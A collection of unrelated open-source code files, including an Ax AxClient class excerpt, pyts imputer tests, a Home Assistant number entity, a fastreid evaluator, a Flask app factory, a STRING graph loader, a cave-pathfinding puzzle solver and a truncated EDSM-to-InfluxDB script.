) -> AxPlotConfig:
"""Retrieves a plot configuration for a contour plot of the response
surface. For response surfaces with more than two parameters,
selected two parameters will appear on the axes, and remaining parameters
will be affixed to the middle of their range. If contour params arguments
are not provided, the first two parameters in the search space will be
used. If contour metrics are not provided, objective will be used.
Args:
param_x: name of parameters to use on x-axis for
the contour response surface plots.
param_y: name of parameters to use on y-axis for
the contour response surface plots.
metric_name: Name of the metric, for which to plot the response
surface.
"""
if not self.experiment.trials:
raise ValueError("Cannot generate plot as there are no trials.")
if len(self.experiment.parameters) < 2:
raise ValueError(
"Cannot create a contour plot as experiment has less than 2 "
"parameters, but a contour-related argument was provided."
)
if (param_x or param_y) and not (param_x and param_y):
raise ValueError(
"If `param_x` is provided, `param_y` is "
"required as well, and vice-versa."
)
objective_name = self.objective_name
if not metric_name:
metric_name = objective_name
if not param_x or not param_y:
parameter_names = list(self.experiment.parameters.keys())
param_x = parameter_names[0]
param_y = parameter_names[1]
if param_x not in self.experiment.parameters:
raise ValueError(
f'Parameter "{param_x}" not found in the optimization search space.'
)
if param_y not in self.experiment.parameters:
raise ValueError(
f'Parameter "{param_y}" not found in the optimization search space.'
)
if metric_name not in self.experiment.metrics:
raise ValueError(
f'Metric "{metric_name}" is not associated with this optimization.'
)
if self.generation_strategy.model is not None:
try:
logger.info(
f"Retrieving contour plot with parameter '{param_x}' on X-axis "
f"and '{param_y}' on Y-axis, for metric '{metric_name}'. "
"Ramaining parameters are affixed to the middle of their range."
)
return plot_contour(
model=not_none(self.generation_strategy.model),
param_x=param_x,
param_y=param_y,
metric_name=metric_name,
)
except NotImplementedError:
# Some models don't implement '_predict', which is needed
# for the contour plots.
logger.info(
f"Model {self.generation_strategy.model} does not implement "
"`predict`, so it cannot be used to generate a response "
"surface plot."
)
raise ValueError(
f'Could not obtain contour plot of "{metric_name}" for parameters '
f'"{param_x}" and "{param_y}", as a model with predictive ability, '
"such as a Gaussian Process, has not yet been trained in the course "
"of this optimization."
)
def load_experiment_from_database(self, experiment_name: str) -> None:
"""Load an existing experiment from database using the `DBSettings`
passed to this `AxClient` on instantiation.
Args:
experiment_name: Name of the experiment.
Returns:
Experiment object.
"""
if not self.db_settings:
raise ValueError( # pragma: no cover
"Cannot load an experiment in the absence of the DB settings."
"Please initialize `AxClient` with DBSettings."
)
experiment, generation_strategy = load_experiment_and_generation_strategy(
experiment_name=experiment_name, db_settings=self.db_settings
)
self._experiment = experiment
logger.info(f"Loaded {experiment}.")
if generation_strategy is None: # pragma: no cover
self._generation_strategy = choose_generation_strategy(
search_space=self._experiment.search_space,
enforce_sequential_optimization=self._enforce_sequential_optimization,
random_seed=self._random_seed,
)
else:
self._generation_strategy = generation_strategy
logger.info(
f"Using generation strategy associated with the loaded experiment:"
f" {generation_strategy}."
)
def get_model_predictions(
self, metric_names: Optional[List[str]] = None
) -> Dict[int, Dict[str, Tuple[float, float]]]:
"""Retrieve model-estimated means and covariances for all metrics.
Note: this function retrieves the predictions for the 'in-sample' arms,
which means that the return mapping on this function will only contain
predictions for trials that have been completed with data.
Args:
metric_names: Names of the metrics, for which to retrieve predictions.
All metrics on experiment will be retrieved if this argument was
not specified.
Returns:
A mapping from trial index to a mapping of metric names to tuples
of predicted metric mean and SEM, of form:
{ trial_index -> { metric_name: ( mean, SEM ) } }.
"""
if self.generation_strategy.model is None: # pragma: no cover
raise ValueError("No model has been instantiated yet.")
if metric_names is None and self.experiment.metrics is None:
raise ValueError( # pragma: no cover
"No metrics to retrieve specified on the experiment or as "
"argument to `get_model_predictions`."
)
arm_info, _, _ = _get_in_sample_arms(
model=not_none(self.generation_strategy.model),
metric_names=set(metric_names)
if metric_names is not None
else set(not_none(self.experiment.metrics).keys()),
)
trials = checked_cast_dict(int, Trial, self.experiment.trials)
return {
trial_index: {
m: (
arm_info[not_none(trials[trial_index].arm).name].y_hat[m],
arm_info[not_none(trials[trial_index].arm).name].se_hat[m],
)
for m in arm_info[not_none(trials[trial_index].arm).name].y_hat
}
for trial_index in trials
if not_none(trials[trial_index].arm).name in arm_info
}
def verify_trial_parameterization(
self, trial_index: int, parameterization: TParameterization
) -> bool:
"""Whether the given parameterization matches that of the arm in the trial
specified in the trial index.
"""
return (
not_none(self._get_trial(trial_index=trial_index).arm).parameters
== parameterization
)
# ------------------ JSON serialization & storage methods. -----------------
def save_to_json_file(self, filepath: str = "ax_client_snapshot.json") -> None:
"""Save a JSON-serialized snapshot of this `AxClient`'s settings and state
to a .json file by the given path.
"""
with open(filepath, "w+") as file: # pragma: no cover
file.write(json.dumps(self.to_json_snapshot()))
logger.info(f"Saved JSON-serialized state of optimization to `{filepath}`.")
@staticmethod
def load_from_json_file(filepath: str = "ax_client_snapshot.json") -> "AxClient":
"""Restore an `AxClient` and its state from a JSON-serialized snapshot,
residing in a .json file by the given path.
"""
with open(filepath, "r") as file: # pragma: no cover
serialized = json.loads(file.read())
return AxClient.from_json_snapshot(serialized=serialized)
def to_json_snapshot(self) -> Dict[str, Any]:
"""Serialize this `AxClient` to JSON to be able to interrupt and restart
optimization and save it to file by the provided path.
Returns:
A JSON-safe dict representation of this `AxClient`.
"""
return {
"_type": self.__class__.__name__,
"experiment": object_to_json(self._experiment),
"generation_strategy": object_to_json(self._generation_strategy),
"_enforce_sequential_optimization": self._enforce_sequential_optimization,
"_updated_trials": object_to_json(self._updated_trials),
}
@staticmethod
def from_json_snapshot(serialized: Dict[str, Any]) -> "AxClient":
"""Recreate an `AxClient` from a JSON snapshot."""
experiment = object_from_json(serialized.pop("experiment"))
serialized_generation_strategy = serialized.pop("generation_strategy")
ax_client = AxClient(
generation_strategy=generation_strategy_from_json(
generation_strategy_json=serialized_generation_strategy
)
if serialized_generation_strategy is not None
else None,
enforce_sequential_optimization=serialized.pop(
"_enforce_sequential_optimization"
),
)
ax_client._experiment = experiment
ax_client._updated_trials = object_from_json(serialized.pop("_updated_trials"))
return ax_client
# ---------------------- Private helper methods. ---------------------
@property
def experiment(self) -> Experiment:
"""Returns the experiment set on this Ax client."""
if self._experiment is None:
raise ValueError(
"Experiment not set on Ax client. Must first "
"call load_experiment or create_experiment to use handler functions."
)
return not_none(self._experiment)
@property
def generation_strategy(self) -> GenerationStrategy:
"""Returns the generation strategy, set on this experiment."""
if self._generation_strategy is None:
raise ValueError(
"No generation strategy has been set on this optimization yet."
)
return not_none(self._generation_strategy)
@property
def objective_name(self) -> str:
"""Returns the name of the objective in this optimization."""
opt_config = not_none(self.experiment.optimization_config)
return opt_config.objective.metric.name
def _save_experiment_and_generation_strategy_to_db_if_possible(
self, overwrite_existing_experiment: bool = False
) -> bool:
"""Saves attached experiment and generation strategy if DB settings are
set on this AxClient instance.
Args:
overwrite_existing_experiment: If the experiment being created
has the same name as some experiment already stored, this flag
determines whether to overwrite the existing experiment.
Defaults to False.
Returns:
bool: Whether the experiment was saved.
"""
if self.db_settings is not None:
save_experiment_and_generation_strategy(
experiment=self.experiment,
generation_strategy=self.generation_strategy,
db_settings=self.db_settings,
overwrite_existing_experiment=overwrite_existing_experiment,
)
return True
return False
def _get_new_data(self) -> Data:
"""
Returns new data since the last run of the generator.
Returns:
Latest data.
"""
return Data.from_multiple_data(
[
self.experiment.lookup_data_for_trial(idx)[0]
for idx in self._updated_trials
]
)
def _gen_new_generator_run(self, n: int = 1) -> GeneratorRun:
"""Generate new generator run for this experiment.
Args:
n: Number of arms to generate.
"""
new_data = self._get_new_data()
# If random seed is not set for this optimization, context manager does
# nothing; otherwise, it sets the random seed for torch, but only for the
# scope of this call. This is important because torch seed is set globally,
# so if we just set the seed without the context manager, it can have
# serious negative impact on the performance of the models that employ
# stochasticity.
with manual_seed(seed=self._random_seed) and warnings.catch_warnings():
# Filter out GPYTorch warnings to avoid confusing users.
warnings.simplefilter("ignore")
return not_none(self.generation_strategy).gen(
experiment=self.experiment,
new_data=new_data,
n=n,
pending_observations=get_pending_observation_features(
experiment=self.experiment
),
)
def _get_trial(self, trial_index: int) -> Trial:
"""Gets trial by given index or raises an error if it does not exist."""
if trial_index in self.experiment.trials:
trial = self.experiment.trials.get(trial_index)
if not isinstance(trial, Trial):
raise NotImplementedError(
"`AxClient` only supports `Trial`, not `BatchTrial`."
)
return trial
raise ValueError(f"Trial {trial_index} does not yet exist.")
def _find_last_trial_with_parameterization(
self, parameterization: TParameterization
) -> int:
"""Given a parameterization, find the last trial in the experiment that
contains an arm with that parameterization.
"""
for trial_idx in reversed(sorted(self.experiment.trials.keys())):
if not_none(self._get_trial(trial_idx).arm).parameters == parameterization:
return trial_idx
raise ValueError(
f"No trial on experiment matches parameterization {parameterization}."
)
# -------- Backward-compatibility with old save / load method names. -------
@staticmethod
def load_experiment(experiment_name: str) -> None:
raise NotImplementedError(
"Use `load_experiment_from_database` to load from SQL database or "
"`load_from_json_file` to load optimization state from .json file."
)
@staticmethod
def load(filepath: Optional[str] = None) -> None:
raise NotImplementedError(
"Use `load_experiment_from_database` to load from SQL database or "
"`load_from_json_file` to load optimization state from .json file."
)
@staticmethod
def save(filepath: Optional[str] = None) -> None:
raise NotImplementedError(
"Use `save_to_json_file` to save optimization state to .json file."
)
|
the-stack_106_16870
|
"""Testing for imputers."""
# Author: Johann Faouzi <[email protected]>
# License: BSD-3-Clause
import numpy as np
import pytest
import re
from pyts.preprocessing import InterpolationImputer
X = [[np.nan, 1, 2, 3, np.nan, 5, 6, np.nan]]
@pytest.mark.parametrize(
'params, error, err_msg',
[({'missing_values': np.inf}, ValueError,
"'missing_values' cannot be infinity."),
({'missing_values': "3"}, ValueError,
"'missing_values' must be an integer, a float, None or np.nan "
"(got {0!s})".format("3")),
({'strategy': 'whoops'}, ValueError,
"'strategy' must be an integer or one of 'linear', 'nearest', "
"'zero', 'slinear', 'quadratic', 'cubic', 'previous', 'next' "
"(got {0})".format('whoops'))]
)
def test_parameter_check(params, error, err_msg):
"""Test parameter validation."""
imputer = InterpolationImputer(**params)
with pytest.raises(error, match=re.escape(err_msg)):
imputer.transform(X)
@pytest.mark.parametrize(
'params, X, arr_desired',
[({'missing_values': None}, [[None, 10, 8, None, 4, 2, None]],
[[12, 10, 8, 6, 4, 2, 0]]),
({'missing_values': np.nan}, [[np.nan, 10, 8, np.nan, 4, 2, np.nan]],
[[12, 10, 8, 6, 4, 2, 0]]),
({'missing_values': 45.}, [[45., 10, 8, 45., 4, 2, 45.]],
[[12, 10, 8, 6, 4, 2, 0]]),
({'missing_values': 78}, [[78, 10, 8, 78, 4, 2, 78]],
[[12, 10, 8, 6, 4, 2, 0]]),
({'missing_values': None, 'strategy': 'quadratic'},
[[None, 9, 4, None, 0, 1, None]], [[16, 9, 4, 1, 0, 1, 4]]),
({'missing_values': None, 'strategy': 'previous'},
[[5, 9, 4, None, 0, 1, None]], [[5, 9, 4, 4, 0, 1, 1]]),
({'missing_values': None, 'strategy': 'next'},
[[None, 9, 4, None, 0, 1, 8]], [[9, 9, 4, 0, 0, 1, 8]])]
)
def test_actual_results(params, X, arr_desired):
"""Test that the actual results are the expected ones."""
imputer = InterpolationImputer(**params)
arr_actual = imputer.fit_transform(X)
np.testing.assert_allclose(arr_actual, arr_desired, rtol=0, atol=1e-5)
|
the-stack_106_16871
|
"""Select platform for Advantage Air integration."""
import logging
from homeassistant.components.ffmpeg import CONF_INPUT
from homeassistant.components.number import NumberEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_NAME, Platform
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import CONF_PEAK, DOMAIN
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up Noise Detection select platform."""
entity = NoiseDetectionPeakNumber(hass, config_entry)
async_add_entities([entity])
hass.data[DOMAIN].setdefault(config_entry.entry_id, {})
hass.data[DOMAIN][config_entry.entry_id][Platform.NUMBER] = {
"entity": entity,
"updated_by": False,
}
class NoiseDetectionPeakNumber(NumberEntity):
"""A Number Entity to control the peak value of the noise sensor dynamically."""
def __init__(self, hass: HomeAssistant, config_entry: ConfigEntry) -> None:
"""Initialise the NoiseDetectionPeakNumber class."""
super().__init__()
self.hass = hass
self.config_entry = config_entry
self._attr_max_value = 0
self._attr_min_value = -100
self._attr_step = 1
# self._attr_value = float(config_entry.data[CONF_PEAK] * -1)
self._attr_value = float(config_entry.data[CONF_PEAK])
self._attr_name = f'{self.config_entry.data["name"]} Peak'
async def async_set_value(self, value: float) -> None:
"""Update the current value."""
_LOGGER.info("Number async_set_value called")
new_config = {}
for key in self.config_entry.data.keys():
new_config[key] = self.config_entry.data[key]
# new_config[CONF_PEAK] = int(value) * -1
new_config[CONF_PEAK] = int(value)
self._attr_value = value
self.hass.data[DOMAIN][self.config_entry.entry_id][Platform.NUMBER][
"updated_by"
] = True
self.hass.config_entries.async_update_entry(
self.config_entry,
data=new_config,
)
_LOGGER.info(
"%s has set the nosie level to %d",
new_config["name"],
new_config[CONF_PEAK],
)
def update_value(self, value: float) -> None:
"""Update the current value without updating the config entry."""
self._attr_value = value
@property
def unique_id(self):
"""Return Unique ID string."""
return f"{DOMAIN}_binary_{self.config_entry.data.get(CONF_INPUT)}"
@property
def device_info(self):
"""Information about this entity/device."""
return {
"name": self.config_entry.data.get(CONF_NAME),
"model": "ffmpeg",
}
|
the-stack_106_16872
|
# encoding: utf-8
"""
@author: liaoxingyu
@contact: [email protected]
"""
import copy
import logging
import time
import itertools
from collections import OrderedDict
import numpy as np
import torch
import torch.nn.functional as F
from sklearn import metrics
from fastreid.utils import comm
from fastreid.utils.compute_dist import build_dist
from .evaluator import DatasetEvaluator
from .query_expansion import aqe
from .rank_cylib import compile_helper
logger = logging.getLogger(__name__)
class ReidEvaluator(DatasetEvaluator):
def __init__(self, cfg, num_query, output_dir=None):
self.cfg = cfg
self._num_query = num_query
self._output_dir = output_dir
self._cpu_device = torch.device('cpu')
self._predictions = []
self._compile_dependencies()
def reset(self):
self._predictions = []
def process(self, inputs, outputs):
prediction = {
'feats': outputs.to(self._cpu_device, torch.float32),
'pids': inputs['targets'].to(self._cpu_device),
'camids': inputs['camids'].to(self._cpu_device)
}
self._predictions.append(prediction)
def evaluate(self):
if comm.get_world_size() > 1:
comm.synchronize()
predictions = comm.gather(self._predictions, dst=0)
predictions = list(itertools.chain(*predictions))
if not comm.is_main_process():
return {}
else:
predictions = self._predictions
features = []
pids = []
camids = []
for prediction in predictions:
features.append(prediction['feats'])
pids.append(prediction['pids'])
camids.append(prediction['camids'])
features = torch.cat(features, dim=0)
pids = torch.cat(pids, dim=0).numpy()
camids = torch.cat(camids, dim=0).numpy()
# query feature, person ids and camera ids
query_features = features[:self._num_query]
query_pids = pids[:self._num_query]
query_camids = camids[:self._num_query]
# gallery features, person ids and camera ids
gallery_features = features[self._num_query:]
gallery_pids = pids[self._num_query:]
gallery_camids = camids[self._num_query:]
self._results = OrderedDict()
if self.cfg.TEST.AQE.ENABLED:
logger.info("Test with AQE setting")
qe_time = self.cfg.TEST.AQE.QE_TIME
qe_k = self.cfg.TEST.AQE.QE_K
alpha = self.cfg.TEST.AQE.ALPHA
query_features, gallery_features = aqe(query_features, gallery_features, qe_time, qe_k, alpha)
dist = build_dist(query_features, gallery_features, self.cfg.TEST.METRIC)
if self.cfg.TEST.RERANK.ENABLED:
logger.info("Test with rerank setting")
k1 = self.cfg.TEST.RERANK.K1
k2 = self.cfg.TEST.RERANK.K2
lambda_value = self.cfg.TEST.RERANK.LAMBDA
if self.cfg.TEST.METRIC == "cosine":
query_features = F.normalize(query_features, dim=1)
gallery_features = F.normalize(gallery_features, dim=1)
rerank_dist = build_dist(query_features, gallery_features, metric="jaccard", k1=k1, k2=k2)
dist = rerank_dist * (1 - lambda_value) + dist * lambda_value
from .rank import evaluate_rank
cmc, all_AP, all_INP = evaluate_rank(dist, query_pids, gallery_pids, query_camids, gallery_camids)
mAP = np.mean(all_AP)
mINP = np.mean(all_INP)
for r in [1, 3, 5, 10]:
self._results['Rank-{}'.format(r)] = cmc[r - 1] * 100
self._results['mAP'] = mAP * 100
self._results['mINP'] = mINP * 100
self._results["metric"] = (mAP + cmc[0]) / 2 * 100
if self.cfg.TEST.ROC.ENABLED:
from .roc import evaluate_roc
scores, labels = evaluate_roc(dist, query_pids, gallery_pids, query_camids, gallery_camids)
fprs, tprs, thres = metrics.roc_curve(labels, scores)
for fpr in [1e-4, 1e-3, 1e-2]:
ind = np.argmin(np.abs(fprs - fpr))
self._results["TPR@FPR={:.0e}".format(fpr)] = tprs[ind]
return copy.deepcopy(self._results)
def _compile_dependencies(self):
# Since we only evaluate results in rank(0), so we just need to compile
# cython evaluation tool on rank(0)
if comm.is_main_process():
try:
from .rank_cylib.rank_cy import evaluate_cy
except ImportError:
start_time = time.time()
logger.info("> compiling reid evaluation cython tool")
compile_helper()
logger.info(
">>> done with reid evaluation cython tool. Compilation time: {:.3f} "
"seconds".format(time.time() - start_time))
comm.synchronize()
|
the-stack_106_16876
|
# __init__.py is a special Python file that allows a directory to become
# a Python package so it can be accessed using the 'import' statement.
from datetime import datetime
import os
import logging
from flask_script import Manager
from flask import Flask, request
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail
from flask_migrate import Migrate, MigrateCommand
from flask_wtf.csrf import CSRFProtect
from flask_scss import Scss
from flask_user import UserManager, current_user
from flask_admin import Admin
from werkzeug.local import LocalProxy
logging.getLogger().setLevel(logging.INFO)
app = None
current_project = None
user_manager = None
# Instantiate Flask extensions
csrf_protect = CSRFProtect()
db = SQLAlchemy()
mail = Mail()
migrate = Migrate()
flask_admin = Admin(url='/admin/flask_admin')
# Initialize Flask Application
def create_app(extra_config_settings={}):
"""Create a Flask application.
"""
global app, current_project, user_manager
# Instantiate Flask
app = Flask(__name__)
app.logger.info("Created Flask Application")
# Load common settings
app.config.from_object('app.settings')
# Load environment specific settings
app.config.from_object('app.local_settings')
# Load extra settings from extra_config_settings param
app.config.update(extra_config_settings)
# import utils here, because they need the initialized app variable
from app import utils
current_project = LocalProxy(lambda: utils.get_current_project())
Scss(app, static_dir='app/static', asset_dir='app/assets')
# Setup Flask-SQLAlchemy
db.init_app(app)
# Setup Flask-Migrate
migrate.init_app(app, db)
# Setup Flask-Mail
mail.init_app(app)
# Setup Flask-Admin
flask_admin.init_app(app)
# Setup WTForms CSRFProtect
csrf_protect.init_app(app)
# Register REST Api
from app.services import register_blueprints as register_api
register_api(app, url_prefix="/api", exempt_from_csrf = True, csrf_protect = csrf_protect)
csrf_protect
# Register views
from app.views import register_blueprints as register_view
register_view(app, url_prefix="")
# app.logger.info(app.url_map)
# Define bootstrap_is_hidden_field for flask-bootstrap's bootstrap_wtf.html
from wtforms.fields import HiddenField
def is_hidden_field_filter(field):
return isinstance(field, HiddenField)
app.jinja_env.globals['bootstrap_is_hidden_field'] = is_hidden_field_filter
# Setup an error-logger to send emails to app.config.ADMINS
init_email_error_handler(app)
# Setup Flask-User to handle user account related forms
from .models.user_models import User
#from .views.main_views import user_profile_page
# Setup Flask-User
user_manager = UserManager(app, db, User)
# registers all jinja template extensions
from app import template_extensions
# enable CSRF-Protection for all view urls and only exclude /user and /api
"""
remove CSRF check from all requests with settings.py
via WTF_CSRF_CHECK_DEFAULT to False
and only add it to the view requests:
"""
@app.before_request
def check_csrf():
if not request.path.startswith('/user') and not request.path.startswith('/api'):
app.logger.debug(f"CSRF protecting path {request.path}")
csrf_protect.protect()
# for key in app.config:
# app.logger.info(f"{key} {app.config[key]}")
if not app.debug:
users = []
with app.app_context():
# init db
db.create_all()
from app.models.user_models import User
users = db.session.query(User).all()
# check if there are already technical users existing (if so, then this is not the first boot)
no_technical_admin = False if any(user if any(role.name == 'admin' for role in user.roles) else None for user in users) else True
app.logger.info(f"No technical admin present? {no_technical_admin}")
# create default admin if no user exist
if no_technical_admin:
from app.commands.init_db import create_roles
create_roles()
# create the default flask admin
from app.models.user_models import Role
from app.controllers import user_controller
all_roles = Role.query.all()
# app.logger.info(f"Creating admin with attributes: 'Admin', 'Admin', {app.config['ADMIN']}, {app.config['ADMIN_PW']}, {all_roles}")
default_admin_user = user_controller.create_user('Admin', 'Admin', app.config['ADMIN'], app.config['ADMIN_PW'], all_roles)
return app
def init_email_error_handler(app):
"""
Initialize a logger to send emails on error-level messages.
Unhandled exceptions will now send an email message to app.config.ADMINS.
"""
if app.debug: return # Do not send error emails while developing
# Retrieve email settings from app.config
host = app.config['MAIL_SERVER']
port = app.config['MAIL_PORT']
from_addr = app.config['MAIL_DEFAULT_SENDER']
username = app.config['MAIL_USERNAME']
password = app.config['MAIL_PASSWORD']
secure = () if app.config.get('MAIL_USE_TLS') else None
# Retrieve app settings from app.config
to_addr_list = app.config['ADMIN']
subject = app.config.get('APP_SYSTEM_ERROR_SUBJECT_LINE', 'System Error')
# Setup an SMTP mail handler for error-level messages
import logging
from logging.handlers import SMTPHandler
mail_handler = SMTPHandler(
mailhost=(host, port), # Mail host and port
fromaddr=from_addr, # From address
toaddrs=to_addr_list, # To address
subject=subject, # Subject line
credentials=(username, password), # Credentials
secure=secure,
)
mail_handler.setLevel(logging.ERROR)
app.logger.addHandler(mail_handler)
# Log errors using: app.logger.error('Some error message')
|
the-stack_106_16877
|
"""
This file offers the methods to automatically retrieve the graph Deltaproteobacteria bacterium RIFCSPLOWO2_12_FULL_40_28.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def DeltaproteobacteriaBacteriumRifcsplowo212Full4028(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Deltaproteobacteria bacterium RIFCSPLOWO2_12_FULL_40_28 graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Wether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
Wether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instace of Deltaproteobacteria bacterium RIFCSPLOWO2_12_FULL_40_28 graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="DeltaproteobacteriaBacteriumRifcsplowo212Full4028",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
|
the-stack_106_16879
|
#!/usr/bin/env python3
import re
import heapq
with open("input.txt") as f:
depth_line, target_line = f.read().strip().split("\n")
depth = int(re.findall("[0-9]+", depth_line)[0])
coords = re.findall("[0-9]+", target_line)
tx, ty = int(coords[0]), int(coords[1])
erosion = {}
# just go way beyond the target, hope it's big enough
# doesn't take very long to compute
for y in range(1000):
for x in range(2000):
if x == y == 0:
gi = 0
elif x == tx and y == ty:
gi = 0
elif y == 0:
gi = x * 16807
elif x == 0:
gi = y * 48271
else:
gi = erosion[(x - 1, y)] * erosion[(x, y - 1)]
erosion_level = (gi + depth) % 20183
erosion[(x, y)] = erosion_level
GEAR_TORCH = 0
GEAR_CLIMBING = 1
GEAR_NONE = 2
REGION_ROCK = 0
REGION_WET = 1
REGION_NARROW = 2
def check_gear(region, gear_type):
if region == REGION_ROCK:
return gear_type in [GEAR_CLIMBING, GEAR_TORCH]
elif region == REGION_WET:
return gear_type in [GEAR_CLIMBING, GEAR_NONE]
elif region == REGION_NARROW:
return gear_type in [GEAR_TORCH, GEAR_NONE]
assert False, "bad region value to check_gear"
reached = set() # ((x, y), gear_type)
q = [
(0, (0, 0), GEAR_TORCH)
] # (time, (x, y), gear_type), sorted by time (ties safely arbitrary)
heapq.heapify(q) # a min heap
while q:
t, (x, y), gear_type = heapq.heappop(q)
if gear_type == GEAR_TORCH and x == tx and y == ty:
print(t)
break
if ((x, y), gear_type) in reached:
continue
reached.add(((x, y), gear_type))
region_type = erosion[(x, y)] % 3
# Spawn changers
for change_gear in [GEAR_TORCH, GEAR_CLIMBING, GEAR_NONE]:
if check_gear(region_type, change_gear):
heapq.heappush(q, (t + 7, (x, y), change_gear))
if x + 1 < 2000 and check_gear(erosion[(x + 1, y)] % 3, gear_type):
heapq.heappush(q, (t + 1, (x + 1, y), gear_type))
if x - 1 >= 0 and check_gear(erosion[(x - 1, y)] % 3, gear_type):
heapq.heappush(q, (t + 1, (x - 1, y), gear_type))
if y + 1 >= 0 and check_gear(erosion[(x, y + 1)] % 3, gear_type):
heapq.heappush(q, (t + 1, (x, y + 1), gear_type))
if y - 1 >= 0 and check_gear(erosion[(x, y - 1)] % 3, gear_type):
heapq.heappush(q, (t + 1, (x, y - 1), gear_type))
|
the-stack_106_16882
|
#!/usr/bin/python3
# Copyright (C) 2020 Sam Steele
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests, requests_cache, sys, math
from datetime import datetime, date, timedelta
from influxdb import InfluxDBClient
from influxdb.exceptions import InfluxDBClientError
EDSM_API_KEY = ''
EDSM_COMMANDER_NAME = ''
INFLUXDB_HOST = 'localhost'
INFLUXDB_PORT = 8086
INFLUXDB_USERNAME = 'root'
INFLUXDB_PASSWORD = 'root'
INFLUXDB_DATABASE = 'edsm'
points = []
last = None
def add_rank(data, activity):
global points
points.append({
"measurement": "rank",
"time": date.today().isoformat() + "T00:00:00",
"tags": {
"commander": EDSM_COMMANDER_NAME,
"activity": activity
},
"fields": {
"value": data['ranks'][activity],
"progress": data['progress'][activity],
"name": data['ranksVerbose'][activity]
}
})
def fetch_system(name):
try:
response = requests.get('https://www.edsm.net/api-v1/system',
params={'systemName':name, 'showCoordinates':1, 'showPrimaryStar':1, 'apiKey':EDSM_API_KEY})
response.raise_for_status()
except requests.exceptions.HTTPError as err:
print("HTTP request failed: %s" % (err))
sys.exit()
return response.json()
def distance(system1, system2):
s1 = fetch_system(system1)
s2 = fetch_system(system2)
dx = float(s1['coords']['x']) - float(s2['coords']['x'])
dy = float(s1['coords']['y']) - float(s2['coords']['y'])
dz = float(s1['coords']['z']) - float(s2['coords']['z'])
return math.sqrt(dx*dx + dy*dy + dz*dz)
def add_jump(src, dst):
global points
system = fetch_system(dst['system'])
if 'type' in system['primaryStar']:
points.append({
"measurement": "jump",
"time": datetime.fromisoformat(dst['date']).isoformat(),
"tags": {
"commander": EDSM_COMMANDER_NAME,
"system": dst['system'],
"firstDiscover": dst['firstDiscover'],
"primaryStarType": system['primaryStar']['type']
},
"fields": {
"distance": distance(src['system'], dst['system']),
"x": float(system['coords']['x']),
"y": float(system['coords']['y']),
"z": float(system['coords']['z'])
}
})
else:
points.append({
"measurement": "jump",
"time": datetime.fromisoformat(dst['date']).isoformat(),
"tags": {
"commander": EDSM_COMMANDER_NAME,
"system": dst['system'],
"firstDiscover": dst['firstDiscover']
},
"fields": {
"distance": distance(src['system'], dst['system']),
"x": float(system['coords']['x']),
"y": float(system['coords']['y']),
"z": float(system['coords']['z'])
}
})
def fetch_jumps(time):
global last
try:
response = requests.get('https://www.edsm.net/api-logs-v1/get-logs',
params={'commanderName':EDSM_COMMANDER_NAME, 'apiKey':EDSM_API_KEY, 'endDateTime':time})
response.raise_for_status()
except requests.exceptions.HTTPError as err:
print("HTTP request failed: %s" % (err))
sys.exit()
data = response.json()
print("Got %s jumps from EDSM" % (len(data['logs'])))
for jump in data['logs']:
if last != None:
add_jump(jump, last)
last = jump
return data
try:
client = InfluxDBClient(host=INFLUXDB_HOST, port=INFLUXDB_PORT, username=INFLUXDB_USERNAME, password=INFLUXDB_PASSWORD)
client.create_database(INFLUXDB_DATABASE)
client.switch_database(INFLUXDB_DATABASE)
except InfluxDBClientError as err:
print("InfluxDB connection failed: %s" % (err))
sys.exit()
try:
response = requests.get('https://www.edsm.net/api-commander-v1/get-credits',
params={'commanderName':EDSM_COMMANDER_NAME, 'apiKey':EDSM_API_KEY})
response.raise_for_status()
